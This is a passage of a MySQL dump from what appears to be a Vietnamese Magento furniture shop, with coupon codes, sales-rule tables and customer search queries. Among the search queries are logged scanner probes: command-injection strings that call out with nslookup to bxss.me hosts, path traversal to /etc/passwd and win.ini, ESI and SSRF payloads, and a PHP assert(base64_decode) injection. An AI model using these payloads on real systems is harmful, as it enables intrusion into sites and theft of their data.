08:41:04',1,NULL),(726,2,'FLEXFITGUE',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(727,2,'FLEXFIT3BV',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(728,2,'FLEXFITJWA',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(729,2,'FLEXFITJAH',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(730,2,'FLEXFITD95',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(731,2,'FLEXFITZV2',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(732,2,'FLEXFITLDC',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(733,2,'FLEXFITMLX',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(734,2,'FLEXFITVUU',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(735,2,'FLEXFIT2AV',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(736,2,'FLEXFITMGM',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(737,2,'FLEXFITVB9',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(738,2,'FLEXFITTV1',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(739,2,'FLEXFITFMC',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(740,2,'FLEXFITYZN',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(741,2,'FLEXFITM8A',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(742,2,'FLEXFITDAU',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(743,2,'FLEXFITVWC',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(744,2,'FLEXFIT2J7',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(745,2,'FLEXFIT3C2',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(746,2,'FLEXFITQQL',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(747,2,'FLEXFITLTO',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(748,2,'FLEXFITOW3',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(749,2,'FLEXFITZVY',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(750,2,'FLEXFITVY5',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(751,2,'FLEXFITDLA',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(752,2,'FLEXFITQAW',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(753,2,'FLEXFIT6PC',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(754,2,'FLEXFITM0J',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(755,2,'FLEXFITGXG',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(756,2,'FLEXFIT6G9',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(757,2,'FLEXFIT4JJ',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(758,2,'FLEXFITEKJ',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(759,2,'FLEXFITBCM',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(760,2,'FLEXFITQCG',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(761,2,'FLEXFIT2SV',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(762,2,'FLEXFIT5X3',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(763,2,'FLEXFIT90C',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(764,2,'FLEXFITEVH',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(765,2,'FLEXFITYAA',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(766,2,'FLEXFITGM2',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(767,2,'FLEXFITA9T',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(768,2,'FLEXFITTSR',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(769,2,'FLEXFITL6A',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(770,2,'FLEXFIT206',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(771,2,'FLEXFITBRZ',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(772,2,'FLEXFITKG2',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(773,2,'FLEXFIT6YU',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(774,2,'FLEXFITH6J',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(775,2,'FLEXFITEZ3',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(776,2,'FLEXFITDYQ',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(777,2,'FLEXFITJRZ',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(778,2,'FLEXFIT1FS',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(779,2,'FLEXFITAJC',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(780,2,'FLEXFITN6O',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(781,2,'FLEXFITXVL',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(782,2,'FLEXFITS4Z',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(783,2,'FLEXFIT3HB',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(784,2,'FLEXFIT9PV',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(785,2,'FLEXFITZPT',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(786,2,'FLEXFITXPN',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(787,2,'FLEXFITHED',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(788,2,'FLEXFITYQS',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(789,2,'FLEXFIT1NB',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(790,2,'FLEXFITHEZ',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(791,2,'FLEXFITGZ0',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(792,2,'FLEXFITKMB',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(793,2,'FLEXFIT0KK',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(794,2,'FLEXFIT74K',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(795,2,'FLEXFIT1HW',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(796,2,'FLEXFIT94N',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(797,2,'FLEXFITNR8',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(798,2,'FLEXFIT2W1',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(799,2,'FLEXFIT4Q4',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(800,2,'FLEXFITJYP',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(801,2,'FLEXFITRWH',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(802,2,'FLEXFITBLQ',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(803,2,'FLEXFITKZK',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(804,2,'FLEXFITYYQ',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(805,2,'FLEXFITLAE',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(806,2,'FLEXFITYHP',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(807,2,'FLEXFITP1C',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(808,2,'FLEXFITQQ9',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(809,2,'FLEXFITMW0',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(810,2,'FLEXFITZFB',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(811,2,'FLEXFITOP6',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(812,2,'FLEXFITXLW',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(813,2,'FLEXFITHYA',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL),(814,2,'FLEXFITLWQ',1,1,0,NULL,NULL,'2021-12-30 08:41:04',1,NULL);

--
-- Table structure for table `salesrule_coupon_aggregated`
--

CREATE TABLE `salesrule_coupon_aggregated` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'ID',
  `period` date NOT NULL COMMENT 'Period',
  `store_id` smallint(5) unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `coupon_code` varchar(50) DEFAULT NULL COMMENT 'Coupon Code',
  `coupon_uses` int(11) NOT NULL DEFAULT 0 COMMENT 'Coupon Uses',
  `subtotal_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Subtotal Amount',
  `discount_amount` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Discount Amount',
  `total_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Amount',
  `subtotal_amount_actual` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Subtotal Amount Actual',
  `discount_amount_actual` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Discount Amount Actual',
  `total_amount_actual` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Amount Actual',
  `rule_name` varchar(255) DEFAULT NULL COMMENT 'Rule Name',
  PRIMARY KEY (`id`),
  UNIQUE KEY `SALESRULE_COUPON_AGGRED_PERIOD_STORE_ID_ORDER_STS_COUPON_CODE` (`period`,`store_id`,`order_status`,`coupon_code`),
  KEY `SALESRULE_COUPON_AGGREGATED_STORE_ID` (`store_id`),
  KEY `SALESRULE_COUPON_AGGREGATED_RULE_NAME` (`rule_name`),
  CONSTRAINT `SALESRULE_COUPON_AGGREGATED_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COMMENT='Coupon Aggregated';

--
-- Dumping data for table `salesrule_coupon_aggregated`
--

INSERT INTO `salesrule_coupon_aggregated` VALUES (5,'2021-12-16',9,'complete','FLEXFITPIG',1,1496000.0000,500000.0000,996000.0000,1496000.0000,-500000.0000,996000.0000,'Voucher giảm giá 500k'),(6,'2021-12-16',0,'complete','FLEXFITPIG',1,1496000.0000,500000.0000,996000.0000,1496000.0000,-500000.0000,996000.0000,'Voucher giảm giá 500k');

--
-- Table structure for table `salesrule_coupon_aggregated_order`
--

CREATE TABLE `salesrule_coupon_aggregated_order` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'ID',
  `period` date NOT NULL COMMENT 'Period',
  `store_id` smallint(5) unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `coupon_code` varchar(50) DEFAULT NULL COMMENT 'Coupon Code',
  `coupon_uses` int(11) NOT NULL DEFAULT 0 COMMENT 'Coupon Uses',
  `subtotal_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Subtotal Amount',
  `discount_amount` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Discount Amount',
  `total_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Amount',
  `rule_name` varchar(255) DEFAULT NULL COMMENT 'Rule Name',
  PRIMARY KEY (`id`),
  UNIQUE KEY `UNQ_1094D1FBBCBB11704A29DEF3ACC37D2B` (`period`,`store_id`,`order_status`,`coupon_code`),
  KEY `SALESRULE_COUPON_AGGREGATED_ORDER_STORE_ID` (`store_id`),
  KEY `SALESRULE_COUPON_AGGREGATED_ORDER_RULE_NAME` (`rule_name`),
  CONSTRAINT `SALESRULE_COUPON_AGGREGATED_ORDER_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Coupon Aggregated Order';

--
-- Dumping data for table `salesrule_coupon_aggregated_order`
--


--
-- Table structure for table `salesrule_coupon_aggregated_updated`
--

CREATE TABLE `salesrule_coupon_aggregated_updated` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'ID',
  `period` date NOT NULL COMMENT 'Period',
  `store_id` smallint(5) unsigned DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) DEFAULT NULL COMMENT 'Order Status',
  `coupon_code` varchar(50) DEFAULT NULL COMMENT 'Coupon Code',
  `coupon_uses` int(11) NOT NULL DEFAULT 0 COMMENT 'Coupon Uses',
  `subtotal_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Subtotal Amount',
  `discount_amount` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Discount Amount',
  `total_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Amount',
  `subtotal_amount_actual` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Subtotal Amount Actual',
  `discount_amount_actual` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Discount Amount Actual',
  `total_amount_actual` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Total Amount Actual',
  `rule_name` varchar(255) DEFAULT NULL COMMENT 'Rule Name',
  PRIMARY KEY (`id`),
  UNIQUE KEY `UNQ_7196FA120A4F0F84E1B66605E87E213E` (`period`,`store_id`,`order_status`,`coupon_code`),
  KEY `SALESRULE_COUPON_AGGREGATED_UPDATED_STORE_ID` (`store_id`),
  KEY `SALESRULE_COUPON_AGGREGATED_UPDATED_RULE_NAME` (`rule_name`),
  CONSTRAINT `SALESRULE_COUPON_AGGREGATED_UPDATED_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='Salesrule Coupon Aggregated Updated';

--
-- Dumping data for table `salesrule_coupon_aggregated_updated`
--


--
-- Table structure for table `salesrule_coupon_usage`
--

CREATE TABLE `salesrule_coupon_usage` (
  `coupon_id` int(10) unsigned NOT NULL COMMENT 'Coupon ID',
  `customer_id` int(10) unsigned NOT NULL COMMENT 'Customer ID',
  `times_used` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Times Used',
  PRIMARY KEY (`coupon_id`,`customer_id`),
  KEY `SALESRULE_COUPON_USAGE_CUSTOMER_ID` (`customer_id`),
  CONSTRAINT `SALESRULE_COUPON_USAGE_COUPON_ID_SALESRULE_COUPON_COUPON_ID` FOREIGN KEY (`coupon_id`) REFERENCES `salesrule_coupon` (`coupon_id`) ON DELETE CASCADE,
  CONSTRAINT `SALESRULE_COUPON_USAGE_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Salesrule Coupon Usage';

--
-- Dumping data for table `salesrule_coupon_usage`
--


--
-- Table structure for table `salesrule_customer`
--

CREATE TABLE `salesrule_customer` (
  `rule_customer_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Rule Customer ID',
  `rule_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Rule ID',
  `customer_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Customer ID',
  `times_used` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Times Used',
  PRIMARY KEY (`rule_customer_id`),
  KEY `SALESRULE_CUSTOMER_RULE_ID_CUSTOMER_ID` (`rule_id`,`customer_id`),
  KEY `SALESRULE_CUSTOMER_CUSTOMER_ID_RULE_ID` (`customer_id`,`rule_id`),
  CONSTRAINT `SALESRULE_CUSTOMER_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE,
  CONSTRAINT `SALESRULE_CUSTOMER_RULE_ID_SALESRULE_RULE_ID` FOREIGN KEY (`rule_id`) REFERENCES `salesrule` (`rule_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Salesrule Customer';

--
-- Dumping data for table `salesrule_customer`
--


--
-- Table structure for table `salesrule_customer_group`
--

CREATE TABLE `salesrule_customer_group` (
  `rule_id` int(10) unsigned NOT NULL COMMENT 'Rule ID',
  `customer_group_id` int(10) unsigned NOT NULL COMMENT 'Customer Group ID',
  PRIMARY KEY (`rule_id`,`customer_group_id`),
  KEY `SALESRULE_CUSTOMER_GROUP_CUSTOMER_GROUP_ID` (`customer_group_id`),
  CONSTRAINT `SALESRULE_CSTR_GROUP_CSTR_GROUP_ID_CSTR_GROUP_CSTR_GROUP_ID` FOREIGN KEY (`customer_group_id`) REFERENCES `customer_group` (`customer_group_id`) ON DELETE CASCADE,
  CONSTRAINT `SALESRULE_CUSTOMER_GROUP_RULE_ID_SALESRULE_RULE_ID` FOREIGN KEY (`rule_id`) REFERENCES `salesrule` (`rule_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Rules To Customer Groups Relations';

--
-- Dumping data for table `salesrule_customer_group`
--

INSERT INTO `salesrule_customer_group` VALUES (2,0),(2,1),(3,0),(3,1),(4,0),(4,1);

--
-- Table structure for table `salesrule_label`
--

CREATE TABLE `salesrule_label` (
  `label_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Label ID',
  `rule_id` int(10) unsigned NOT NULL COMMENT 'Rule ID',
  `store_id` smallint(5) unsigned NOT NULL COMMENT 'Store ID',
  `label` varchar(255) DEFAULT NULL COMMENT 'Label',
  PRIMARY KEY (`label_id`),
  UNIQUE KEY `SALESRULE_LABEL_RULE_ID_STORE_ID` (`rule_id`,`store_id`),
  KEY `SALESRULE_LABEL_STORE_ID` (`store_id`),
  CONSTRAINT `SALESRULE_LABEL_RULE_ID_SALESRULE_RULE_ID` FOREIGN KEY (`rule_id`) REFERENCES `salesrule` (`rule_id`) ON DELETE CASCADE,
  CONSTRAINT `SALESRULE_LABEL_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8 COMMENT='Salesrule Label';

--
-- Dumping data for table `salesrule_label`
--

INSERT INTO `salesrule_label` VALUES (5,3,0,'Voucher giảm giá 300,000 VND');

--
-- Table structure for table `salesrule_product_attribute`
--

CREATE TABLE `salesrule_product_attribute` (
  `rule_id` int(10) unsigned NOT NULL COMMENT 'Rule ID',
  `website_id` smallint(5) unsigned NOT NULL COMMENT 'Website ID',
  `customer_group_id` int(10) unsigned NOT NULL COMMENT 'Customer Group ID',
  `attribute_id` smallint(5) unsigned NOT NULL COMMENT 'Attribute ID',
  PRIMARY KEY (`rule_id`,`website_id`,`customer_group_id`,`attribute_id`),
  KEY `SALESRULE_PRODUCT_ATTRIBUTE_WEBSITE_ID` (`website_id`),
  KEY `SALESRULE_PRODUCT_ATTRIBUTE_CUSTOMER_GROUP_ID` (`customer_group_id`),
  KEY `SALESRULE_PRODUCT_ATTRIBUTE_ATTRIBUTE_ID` (`attribute_id`),
  CONSTRAINT `SALESRULE_PRD_ATTR_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  CONSTRAINT `SALESRULE_PRD_ATTR_CSTR_GROUP_ID_CSTR_GROUP_CSTR_GROUP_ID` FOREIGN KEY (`customer_group_id`) REFERENCES `customer_group` (`customer_group_id`) ON DELETE CASCADE,
  CONSTRAINT `SALESRULE_PRODUCT_ATTRIBUTE_RULE_ID_SALESRULE_RULE_ID` FOREIGN KEY (`rule_id`) REFERENCES `salesrule` (`rule_id`) ON DELETE CASCADE,
  CONSTRAINT `SALESRULE_PRODUCT_ATTRIBUTE_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Salesrule Product Attribute';

--
-- Dumping data for table `salesrule_product_attribute`
--

INSERT INTO `salesrule_product_attribute` VALUES (2,1,0,105),(2,1,1,105),(3,1,0,105),(3,1,1,105),(4,1,0,105),(4,1,1,105);

--
-- Table structure for table `salesrule_website`
--

CREATE TABLE `salesrule_website` (
  `rule_id` int(10) unsigned NOT NULL COMMENT 'Rule ID',
  `website_id` smallint(5) unsigned NOT NULL COMMENT 'Website ID',
  PRIMARY KEY (`rule_id`,`website_id`),
  KEY `SALESRULE_WEBSITE_WEBSITE_ID` (`website_id`),
  CONSTRAINT `SALESRULE_WEBSITE_RULE_ID_SALESRULE_RULE_ID` FOREIGN KEY (`rule_id`) REFERENCES `salesrule` (`rule_id`) ON DELETE CASCADE,
  CONSTRAINT `SALESRULE_WEBSITE_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Rules To Websites Relations';

--
-- Dumping data for table `salesrule_website`
--

INSERT INTO `salesrule_website` VALUES (2,1),(3,1),(4,1);

--
-- Table structure for table `search_query`
--

CREATE TABLE `search_query` (
  `query_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Query ID',
  `query_text` varchar(255) DEFAULT NULL COMMENT 'Query text',
  `num_results` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Num results',
  `popularity` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Popularity',
  `redirect` varchar(255) DEFAULT NULL COMMENT 'Redirect',
  `store_id` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `display_in_terms` smallint(6) NOT NULL DEFAULT 1 COMMENT 'Display in terms',
  `is_active` smallint(6) DEFAULT 1 COMMENT 'Active status',
  `is_processed` smallint(6) DEFAULT 0 COMMENT 'Processed status',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated at',
  PRIMARY KEY (`query_id`),
  UNIQUE KEY `SEARCH_QUERY_QUERY_TEXT_STORE_ID` (`query_text`,`store_id`),
  KEY `SEARCH_QUERY_QUERY_TEXT_STORE_ID_POPULARITY` (`query_text`,`store_id`,`popularity`),
  KEY `SEARCH_QUERY_STORE_ID` (`store_id`),
  KEY `SEARCH_QUERY_IS_PROCESSED` (`is_processed`),
  KEY `SEARCH_QUERY_STORE_ID_POPULARITY` (`store_id`,`popularity`),
  CONSTRAINT `SEARCH_QUERY_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=17734 DEFAULT CHARSET=utf8 COMMENT='Search query table';

--
-- Dumping data for table `search_query`
--

INSERT INTO `search_query` VALUES (118,'chai',0,1,NULL,9,1,1,0,'2021-05-21 10:51:38'),(120,'chair',16,5,NULL,9,1,1,0,'2021-06-01 01:39:46'),(126,'chairr',0,1,NULL,9,1,1,0,'2021-05-21 10:53:07'),(132,'hg',0,1,NULL,9,1,1,0,'2021-05-22 10:08:54'),(135,'Lit',0,1,NULL,9,1,1,0,'2021-05-22 10:09:18'),(137,'Litte',0,1,NULL,9,1,1,0,'2021-05-22 10:09:19'),(139,'ch',80,2,NULL,9,1,1,0,'2021-12-27 05:13:51'),(599,'Trên',1,1,NULL,9,1,1,0,'2021-10-04 14:00:06'),(601,'Trên 4',2,1,NULL,9,1,1,0,'2021-10-04 14:00:06'),(603,'Trên 4m2',2,1,NULL,9,1,1,0,'2021-10-04 14:00:07'),(605,'bàn',145,79,NULL,9,1,1,0,'2022-01-09 02:10:05'),(607,'bàn làm việc màu trắng',42,2,NULL,9,1,1,0,'2021-10-08 09:19:18'),(612,'helios',17,2,NULL,9,1,1,0,'2021-10-15 05:07:07'),(616,'helios 4',20,1,NULL,9,1,1,0,'2021-10-15 05:07:09'),(618,'erd 2300',0,2,NULL,9,1,1,0,'2021-11-14 23:28:07'),(626,'Further 47 -2MR',44,3,NULL,9,1,1,0,'2021-12-01 20:21:53'),(629,'sofa',22,117,NULL,9,1,1,0,'2022-01-10 01:49:26'),(633,'Gương',4,7,NULL,9,1,1,0,'2021-12-26 12:53:03'),(645,'giá',81,3,NULL,9,1,1,0,'2021-12-18 13:36:52'),(649,'kệ',15,6,NULL,9,1,1,0,'2022-01-08 01:47:29'),(652,'tủ',69,10,NULL,9,1,1,0,'2022-01-03 09:28:57'),(655,'TS',0,1,NULL,9,1,1,0,'2021-10-25 02:22:26'),(657,'TS312',0,2,NULL,9,1,1,0,'2021-10-25 02:22:27'),(661,'tô',0,1,NULL,9,1,1,0,'2021-10-25 02:22:45'),(663,'topsofa',11,2,NULL,9,1,1,0,'2021-10-25 02:22:47'),(668,'test',0,40,NULL,9,1,1,0,'2021-11-16 06:45:18'),(672,'1PVPZS3QO',0,1,NULL,9,1,1,0,'2021-10-30 18:53:50'),(674,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003690349313\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003690349313\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-30 18:53:52'),(676,'response.write(9881742*9471149)',0,1,NULL,9,1,1,0,'2021-10-30 18:53:52'),(678,'echo tctshx$()\\ xtmpav\\nz^xyu||a #\' &echo tctshx$()\\ xtmpav\\nz^xyu||a #|\" &echo tctshx$()\\ xtmpav\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-30 18:53:54'),(680,'aaa&shards=http://hitdrsebppvco306cc.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-30 18:53:57'),(682,'\'+response.write(9881742*9471149)+\'',0,1,NULL,9,1,1,0,'2021-10-30 18:53:58'),(684,'&echo ivrett$()\\ voyeod\\nz^xyu||a #\' &echo ivrett$()\\ voyeod\\nz^xyu||a #|\" &echo ivrett$()\\ voyeod\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-30 18:54:01'),(688,'l6gLK4FT',0,1,NULL,9,1,1,0,'2021-10-30 18:54:06'),(690,'\"+response.write(9881742*9471149)+\"',0,1,NULL,9,1,1,0,'2021-10-30 18:54:07'),(692,'|echo ilgaqr$()\\ ztpvsm\\nz^xyu||a #\' |echo ilgaqr$()\\ ztpvsm\\nz^xyu||a #|\" |echo ilgaqr$()\\ ztpvsm\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-30 18:54:08'),(694,'../../../../../../../../../../../../../../etc/passwd',0,19,NULL,9,1,1,0,'2021-10-31 22:54:09'),(696,'test<esi:include src=\"http://bxss.me/rpb.png\"/>',0,2,NULL,9,1,1,0,'2021-10-31 03:17:30'),(698,'(nslookup hitssylepertl21650.bxss.me||perl -e \"gethostbyname(\'hitssylepertl21650.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-30 18:54:14'),(700,'../../../../../../../../../../../../../../windows/win.ini',0,19,NULL,9,1,1,0,'2021-10-31 22:54:16'),(702,'12345\'\"\\\'\\\");|]*\0{\r\n<\0>?\'\'????',0,19,NULL,9,1,1,0,'2021-10-31 22:54:18'),(704,'${9999777+9999388}',0,1,NULL,9,1,1,0,'2021-10-30 18:54:20'),(706,'http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg',0,19,NULL,9,1,1,0,'2021-10-31 22:54:23'),(708,'$(nslookup hitzazqrscbpbb0ee8.bxss.me||perl -e \"gethostbyname(\'hitzazqrscbpbb0ee8.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-30 18:54:22'),(714,'test&n965964=v974459',0,1,NULL,9,1,1,0,'2021-10-30 18:54:27'),(716,'\'.gethostbyname(lc(\'hitgy\'.\'ewhlakryb9179.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(117).chr(87).chr(102).chr(82).\'',4,1,NULL,9,1,1,0,'2021-10-30 18:54:28'),(718,')',0,0,NULL,9,1,1,0,'2021-10-30 18:54:29'),(719,'1some_inexistent_file_with_long_name\0.jpg',0,19,NULL,9,1,1,0,'2021-10-31 22:54:30'),(721,'&(nslookup hitmadmqffwgne0305.bxss.me||perl -e \"gethostbyname(\'hitmadmqffwgne0305.bxss.me\')\")&\'\\\"`0&(nslookup hitmadmqffwgne0305',0,1,NULL,9,1,1,0,'2021-10-30 18:54:30'),(723,';assert(base64_decode(\'cHJpbnQobWQ1KDMxMzM3KSk7\'));',0,19,NULL,9,1,1,0,'2021-10-31 22:54:42'),(725,'../test',0,2,NULL,9,1,1,0,'2021-10-31 